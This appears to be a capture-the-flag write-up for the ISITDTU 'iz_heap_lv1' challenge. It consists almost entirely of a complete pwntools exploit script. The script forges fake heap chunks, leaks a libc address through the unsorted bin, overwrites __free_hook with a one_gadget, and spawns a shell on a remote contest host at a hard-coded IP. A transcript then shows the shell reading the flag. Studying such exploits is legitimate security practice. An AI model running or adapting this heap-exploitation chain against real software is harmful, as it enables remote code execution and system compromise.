Tags: pwn heap 

Rating:

Here is my exploit (by @javierprtd):

from pwn import *

def init(s):
    """Answer the program's opening "Input name: " prompt with *s*.

    Talks to the module-level tube ``io``; *s* is sent as a single line.
    """
    prompt = "Input name: "
    io.recvuntil(prompt)
    io.sendline(s)

def menu(n):
    """Pick menu entry *n* once the "Choice: " prompt has been printed.

    *n* is sent as decimal text on its own line.
    """
    io.recvuntil("Choice: \n")
    choice = str(n)
    io.sendline(choice)

def alloc(n, s):
    """Menu option 1: request a chunk of size *n* filled with data *s*.

    The size goes out as decimal text, the data as a raw line; the call
    blocks until the program prints "Success!".
    """
    menu(1)
    exchanges = (
        ("Enter size: ", str(n)),
        ("Enter data: ", s),
    )
    for prompt, reply in exchanges:
        io.recvuntil(prompt)
        io.sendline(reply)
    io.recvuntil("Success!\n")

def edit(i, n, s):
    """Menu option 2: overwrite entry *i* with *n* bytes of data *s*.

    Index and size are sent as decimal text, data as a raw line; blocks
    until "Success!" is printed. Not used by the exploit sequence below.
    """
    menu(2)
    exchanges = (
        ("Enter index: ", str(i)),
        ("Enter size: ", str(n)),
        ("Enter data: ", s),
    )
    for prompt, reply in exchanges:
        io.recvuntil(prompt)
        io.sendline(reply)
    io.recvuntil("Success!\n")

def remove(i):
    """Menu option 3: submit index *i* at the "Enter index: " prompt.

    Unlike alloc()/edit() it does not wait for a "Success!" line, so any
    output the program produces stays in the tube for the next recvuntil().
    """
    menu(3)
    io.recvuntil("Enter index: ")
    idx = str(i)
    io.sendline(idx)

def show(new_name=None):
    """Menu option 4: display the name, optionally replacing it first.

    When ``new_name`` is given the "(Y/N)" question is answered "Y" and the
    new value is sent at the "Input name: " prompt; otherwise "N" is sent.
    After "Name: " up to 0x28 bytes are read with io.recv() and the slice
    [0x20:0x26] of that buffer is returned.
    """
    menu(4)
    io.recvuntil("DO you want to edit: (Y/N)")
    wants_edit = new_name is not None
    io.sendline("Y" if wants_edit else "N")
    if wants_edit:
        io.recvuntil("Input name: ")
        io.sendline(new_name)
    io.recvuntil("Name: ")
    raw = io.recv(0x28)
    return raw[0x20:0x26]

# --- session setup ----------------------------------------------------------
elf = ELF("./iz_heap_lv1")   # challenge binary shipped with the task
libc = ELF("./libc.so.6")    # libc shipped with the task; the constants below assume this build
env = {"LD_PRELOAD":libc.path}   # only applied in the local process() case
local = False
# `local` toggles between a local process and the contest endpoint from the writeup.
io = process(elf.path, env=env) if local else remote("165.22.110.249", 3333)

# --- stage 1: leak ----------------------------------------------------------
# Name buffer laid out as the author's "fake chunks" (see trailing comment).
init(p64(0x602120) + p64(0)*2 + p64(0x91) + p64(0)*17 + p64(0x21) + p64(0)*3 + p64(0x21)) # fake chunks
# Seven 0x80-byte allocations (indices 0..6), then freed in the same order.
for i in range(7):
    alloc(0x80, "")
for i in range(7):
    remove(i)
remove(20) # free fake chunk and go to unsorted bin
# show() with a 0x1f-byte name returns 6 bytes at offset 0x20 of the name
# region; zero-padded to 8 bytes and decoded as a little-endian pointer.
leak = u64(show("A"*0x1f).ljust(8, '\0')) 
# Fixed offsets relative to the shipped libc.so.6 -- NOTE(review): they hold
# only for that exact build; __free_hook is resolved from the ELF symbols.
base_libc = leak - 0x3ebca0
one_gadget = base_libc + 0x4f322
free_hook = base_libc + libc.symbols['__free_hook']
print "[+] base libc: 0x%x" % base_libc
print "[+] one_gadget: 0x%x" % one_gadget
print "[+] free_hook: 0x%x" % free_hook

# --- stage 2 ----------------------------------------------------------------
# The name region is rewritten through show(), followed by a second round of
# remove()/alloc() calls; the last two allocations carry free_hook and
# one_gadget as their data.
show(p64(0x602120) + p64(0)*2 + p64(0x31))
remove(20)
alloc(0x20, "")
alloc(0x20, "")
remove(0)
show(p64(0)*3 + p64(0x31) + p64(free_hook))
alloc(0x20, p64(free_hook))
alloc(0x20, p64(one_gadget))
remove(1)   # the author's transcript below shows an interactive shell after this call
io.interactive()

# Author's session transcript, kept verbatim (includes the flag obtained).
'''
[+] base libc: 0x7f03a20c4000
[+] one_gadget: 0x7f03a2113322
[+] free_hook: 0x7f03a24b18e8
[*] Switching to interactive mode
$ id
uid=1000(iz_heap_lv1) gid=1000(iz_heap_lv1) groups=1000(iz_heap_lv1)
$ cat /home/iz_heap_lv1/flag
ISITDTU{d800dab9684113a5d6c7d2c0381b48c1553068bc}
'''